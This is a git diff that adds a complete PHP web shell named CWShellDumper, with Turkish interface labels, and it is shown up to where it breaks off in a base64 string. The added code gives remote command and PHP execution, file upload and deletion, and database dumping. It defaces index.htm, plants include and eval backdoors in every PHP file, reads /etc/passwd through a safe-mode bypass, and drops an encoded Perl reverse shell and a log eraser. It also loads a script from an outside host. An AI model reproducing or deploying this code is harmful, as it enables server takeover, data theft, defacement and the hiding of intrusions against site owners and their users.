diff --git a/php/CWShellDumper.php b/php/CWShellDumper.php
new file mode 100644
index 0000000..937f6c4
--- /dev/null
+++ b/php/CWShellDumper.php
@@ -0,0 +1,773 @@
+<?php
+$entry_line="r57.biz";
+$fp = fopen("index.htm", "w");
+fputs($fp, $entry_line);
+fclose($fp);
+#GreetZ:SultanMehmed
+
+// Variables
+   $info = @$_SERVER['SERVER_SOFTWARE'];
+   $page = @$_SERVER['SCRIPT_NAME'];
+   $site = getenv("HTTP_HOST");
+   $uname = php_uname();
+   $smod = ini_get('safe_mode');
+           if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; }
+           else { $safemode = "<font color='red'>ACIK</font>";      }
+   $dir = @realpath($_POST['dir']);
+   $mkdir = @$_POST['makedir'];
+   $mydir = @$_POST['deletedir'];
+   $cmd = @$_GET['cmd'];
+   $host = @$_POST['host'];
+   $proto = @$_POST['protocol'];
+   $delete = @$_POST['delete'];
+   $phpeval = @$_POST['php_eval'];
+   $db = @$_POST['db'];
+   $query = @$_POST['query'];
+   $user = @$_POST['user'];
+   $pass = @$_POST['passd'];
+   $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
+   
+
+   $quotes = get_magic_quotes_gpc();
+if ($quotes == "1" or $quotes == "on")
+   {
+       $quot = "<font color='red'>ACIK</font>";
+   }
+   else
+   {
+       $quot = "<font color='lightgreen'>KAPALI</font>";
+   }
+   // Perms
+    function getperms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+ // milw0rm Search (locushell)
+ 
+$Lversion = @php_uname('r');
+$OSV = @php_uname('s');
+if(eregi('Linux',$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion;
+
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; }
+   //Space
+   $spacedir = @getcwd();
+   $free = @diskfreespace($spacedir);
+   
+if (!$free) {$free = 0;}
+   $all = @disk_total_space($spacedir);
+if (!$all) {$all = 0;}
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+$percentfree = intval(($free*100)/$all);
+
+
+// PHPinfo
+if(isset($_POST['phpinfo']))
+{
+die(phpinfo());
+}
+   
+
+// Make File
+
+   $name = htmlspecialchars(@$_POST['names']);
+   $src = @$_POST['source'];
+    if(isset($name) && isset($src))
+      {
+	  if($_POST['darezz'] != realpath("."))  { $name = $_POST['darezz'].$name; } 
+   $ctd = fopen($name,"w+");
+   fwrite($ctd, $src);
+   fclose($ctd);
+   echo "<script>alert('Uploaded')</script>";
+      }
+
+// Upload File
+   $path = @$_FILES['ffile']['tmp_name'];
+   $name = @$_FILES['ffile']['name'];
+   if(isset($path) && isset($name))
+{  
+if($_POST['dare'] != realpath("."))  { $name = $_POST['dare'].$name; } 
+   if(move_uploaded_file($path, $name))
+   {
+      echo "<script>alert('Uploaded')</script>";
+   }
+   else
+   {
+      echo "<script>alert('Error')</script>";
+}   }
+
+// Delete File
+
+   
+   if(isset($delete) && $delete != $dir)
+{
+      if(file_exists($delete))
+      {
+         unlink($delete);
+         echo "<script>alert('File Deleted')</script>";
+      }
+
+}
+
+// Database
+   
+   if(isset($db) && isset($query) && isset($_POST['godb']))
+{
+   $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>");
+   $db = mysql_select_db($db)or die(mysql_error());
+   $queryz = mysql_query($query)or die(mysql_error());
+if($query) { echo "<script>alert('Done')</script>"; }
+else { echo "<script>alert('Error')</script>"; }
+}
+
+// Dump Database [pacucci.com]
+if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
+mysql_connect('localhost', $user, $pass);
+mysql_select_db($db);
+$tables = mysql_list_tables($db);
+while ($td = mysql_fetch_array($tables))
+{
+$table = $td[0];
+$r = mysql_query("SHOW CREATE TABLE `$table`");
+if ($r)
+{
+$insert_sql = "";
+$d = mysql_fetch_array($r);
+$d[1] .= ";";
+$SQL[] = str_replace("\n", "", $d[1]);
+$table_query = mysql_query("SELECT * FROM `$table`");
+$num_fields = mysql_num_fields($table_query);
+while ($fetch_row = mysql_fetch_array($table_query))
+{
+$insert_sql .= "INSERT INTO $table VALUES(";
+for ($n=1;$n<=$num_fields;$n++)
+{
+$m = $n - 1;
+$insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
+}
+$insert_sql = substr($insert_sql,0,-2);
+$insert_sql .= ");\n";
+}
+if ($insert_sql!= "")
+{
+$SQL[] = $insert_sql;
+}
+}
+}
+$dump = "-- Database: ".$_POST['db'] ." \n";
+$dump .= "-- CWShellDumper v3\n";
+$dump .= "-- r57.biz\n";
+$dumpp = $dump.implode("\r", $SQL);
+$name = $db."-".date("d-m-y")."cyberwarrior.sql";
+Header("Content-type: application/octet-stream"); 
+Header("Content-Disposition: attachment; filename = $name");
+echo $dumpp; 
+die();
+}
+
+// Make Dir
+if(isset($mkdir)) {
+
+mkdir($mkdir);
+if($mkdir) { echo "<script>alert('Tamamdır.')</script>"; } }
+
+// Delete Directory
+
+if(isset($mydir) && $mydir != "$dir") {
+$d = dir($mydir);
+while($entry = $d->read()) {
+ if ($entry !== "." && $entry !== "..") {
+ unlink($entry);
+ }
+}
+$d->close();
+rmdir($mydir);
+
+}
+
+//Infect Files [RFI]
+
+if(isset($_POST['inf3ct']))
+{
+foreach (glob("*.php") as $lola)
+{
+$dira = '.';
+$asdi = fopen($lola, 'a+');
+@fwrite($asdi, '
+<?php
+include($_GET[\'pwn\']); 
+?>');
+@fclose($asdi);
+}
+if($asdi)
+{
+$textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>';
+}
+else {
+$textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>';
+}
+}
+
+//Infect Files [Eval]
+if(isset($_POST['evalinfect']))
+{
+foreach (glob("*.php") as $lal)
+{
+$dira = '.';
+$axd = fopen($lal, 'a+');
+@fwrite($axd, '
+<?php
+eval(stripslashes($_GET[\'eval\'])); 
+?>');
+@fclose($axd);
+}
+if($axd)
+{
+$textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>';
+}
+else {
+$textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>';
+}
+}
+
+// Images
+   if(@$_GET['com'] == "image")
+   {
+   $images = array(
+   "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
+   "file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
+   "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
+   );
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+$image = $images[$_GET['img']];
+ echo  base64_decode($image);
+ }
+//File List
+
+   chdir($dir);
+   if(!isset($dir)) { $dir = @realpath("."); }
+    if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
+   if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
+   $pahtw = 0;
+   $filew = 0;
+   $num = 1;
+  
+   if (is_dir($dir))
+   {
+      if ($open = opendir($dir))
+      {
+	  if(is_dir($dir)) {
+   $typezz = "DIR";
+   $pahtw++;
+ }
+         while (($list = readdir($open)) == true)
+         {
+		 
+         if(is_dir($list)) {
+   $typezz = "DIR";
+   $pahtw++;
+   @$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($list) .'</font></td></tr>'; }
+else {
+  
+   $lolz = filesize($list) / 1024;
+   $lolx = intval($lolz);
+   if($lolx == 0) { $lolx = 1; }
+   $typezz = "DOSYA";
+   $filew++;
+   $listz = "/".$list;
+   if(eregi($page,$listz)) {    @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
+   elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
+   else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }  }
+   
+   }         
+   closedir($open);
+         
+      }
+$fileq = $pahtw + $filew;   }
+
+
+
+
+echo "<html>
+<head>
+<style>
+table.menu {
+border-width: 0px;
+   border-spacing: 1px;
+   border-style: solid;
+   border-color: #a6a6a6;
+   border-collapse: separate;
+   background-color: rgb(98, 97,97);
+}
+table.menuz {
+border-width: 0px;
+   border-spacing: 1px;
+   border-style: solid;
+   border-color: #a6a6a6;
+   border-collapse: separate;
+   background-color: rgb(98, 97,97);
+}
+table.menu td {
+   border-width: 1px;
+   padding: 1px;
+   border-style: none;
+   border-color: #333333;
+   background-color: #000000;
+   -moz-border-radius: 0px;
+}
+table.menuz tr {
+   border-width: 1px;
+   padding: 1px;
+   border-style: none;
+   border-color: #333333;
+   background-color: #000000;
+   -moz-border-radius: 0px;
+}
+
+table.menuz tr:hover {
+	background-color: #111111;
+}
+input,textarea,select {
+font: normal 11px Verdana, Arial, Helvetica, sans-serif;
+background-color:black;
+color:#a6a6a6;
+border: solid 1px #363636;
+}
+</style>
+
+</head>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+<body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>
+<table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>
+<tr><td>
+<center><b><font size='6' face='Webdings'>ü</font>
+<font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a>
+<font size='6' face='Webdings'>ü</font></b>
+</center>
+<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
+</td></tr></table><table class=menu width=100%<tr><td>
+<font size='1' face='Verdana'><b>Site:  </b><u>$site</u> <br>
+<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
+<b>Server Bilgisi : </b> <u>$info</u> <br>
+<b>Uname -a:</b> <u>$uname</u> <br>
+<b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
+<b>Safe Mode:</b>  <u>$safemode</u> <br>
+<b>Sihirli Sozler:</b> <u>$quot</u> <br>
+<b>Sayfa:</b> <u>$page</u><br>
+<b>Boş Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
+<b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>
+<b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr>
+<tr><td><form method='post' action=''>
+<center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
+// Safe Mode Bypass
+if(isset($_POST['safemodz']))
+{
+echo "<tr><td valign=top width=50%>
+<center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>
+<form action='' method='post'>
+      <font size='1' face='Verdana'>Dosya adı:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayı Oku' name='redfi'><br>
+	  </td><tr>
+<td valign=top>
+<center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b>
+   <form method='post' action=''>
+   <font size='1' face='Verdana'>Klasör:</font><br>
+   <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>";
+  }
+   // Safe Mode Bypass: File
+if(isset($_POST['redfi']))
+{
+    $test='';
+    $tempp= tempnam($test, "cx");
+    $get = htmlspecialchars($_POST['filew']);
+    if(copy("compress.zlib://".$get, $tempp)){
+    $fopenzo = fopen($tempp, "r");
+    $freadz = fread($fopenzo, filesize($tempp));
+    fclose($fopenzo);
+    $source = htmlspecialchars($freadz);
+    echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>";
+    unlink($tempp);
+    } else {
+    echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>";
+            }
+   
+}
+
+// Safe Mode Bypass: Directory
+ if(isset($_POST['reddi'])){ 
+   
+function dirz()
+{
+$dirz = $_POST['directory'];
+$files = glob("$dirz*");
+
+foreach ($files as $filename) {
+    echo "<tr><td><font size='1' face='Verdana'>";
+   echo "$filename\n";
+   echo "</font><br>";
+}
+}
+echo "<br>"; dirz(); 
+}
+
+// Connect Back
+if(isset($_POST['connectback']))
+{
+echo "
+<tr><td>
+<center><font size='2' face='Verdana'><b>Back-Connect</b><br></font>
+<form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>"; 
+}
+if(isset($_POST['logeraser']))
+{
+echo "<tr><td>
+<center><b><font size='2' face='Verdana'>:: OS ::<br></font></b>
+        <select name=functionp>
+          <option>linux</option>
+          <option>sunos</option>
+          <option>aix</option>
+          <option>irix</option>
+          <option>openbsd</option>
+		  <option>solaris</option>
+		  <option>suse</option>
+		  <option>lampp</option>
+		  <option>debian</option>
+		  <option>freebsd</option>
+		  <option>misc</option>
+        </select><br><input type='submit' name='runer' value='Erase'></table>";
+		}
+		
+// Connect Back
+if(isset($_POST['connsub']))
+{
+$sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA==");
+$openz = fopen("cbs.pl", "w+")or die("Error");
+fwrite($openz, $sources)or die("Error");
+fclose($openz);
+$aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
+unlink("cbs.pl");
+}
+if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; }
+
+		// Logs Eraser
+if(isset($_POST['runer']))
+{
+echo "<tr><td><center><textarea cols='30' rows='2'>";
+$erase = base64_decode("IyF1c3IvYmluL3BlcmwNCiMgQ1dTSGVsbA0KICAgICAgIGNob21wKCRvcyA9ICRBUkdWWzBdKTsNCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcIm1pc2NcIil7ICNJZiBtaXNjIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdbWlzYyBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCI8dHI+WytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYSA9IHVubGluayBAbWlzYzsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJIA0KICAgICAgICAgICAgaWYoJGEpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwib3BlbmJzZFwiKXsgI0lmIG9wZW5ic2QgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11vcGVuYnNkIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGIgPSB1bmxpbmsgQG9wZW5ic2Q7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgIGlmKCRiKSB7cHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7ICAgfQ0KCQkJZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJmcmVlYnNkXCIpeyAjSWYgZnJlZWJzZCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXWZyZWVic2QgU2VsZWN0ZWQuLi5cXG5cIjsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYyA9IHVubGluayBAZnJlZWJzZDsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRjKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJkZWJpYW5cIil7ICNJZiBEZWJpYW4gdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11kZWJpYW4gU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZCA9IHVubGluayBAZGViaWFuOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGQpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdXNlXCIpeyAjSWYgc3VzZSB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXXN1c2UgU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZSA9IHVubGluayBAc3VzZTsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgaWYoJGUpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSBlbHNlIHsgcHJpbnQgXCJbLV1FcnJvclwiOyB9DQogICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcInNvbGFyaXNcIil7ICNJZiBzb2xhcmlzIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdc29sYXJpcyBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRmID0gdW5saW5rIEBzb2xhcmlzOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGYpIHtwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwibGFtcHBcIil7ICNJZiBsYW1wcCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxhbXBwIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGcgPSB1bmxpbmsgQGxhbXBwOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICBpZigkZykgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkgICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJyZWRoYXRcIil7ICNJZiByZWRoYXQgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11SZWQgSGF0IExpbnV4L01hYyBPUyBYIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGggPSB1bmxpbmsgQHJlZGhhdDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRoKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHk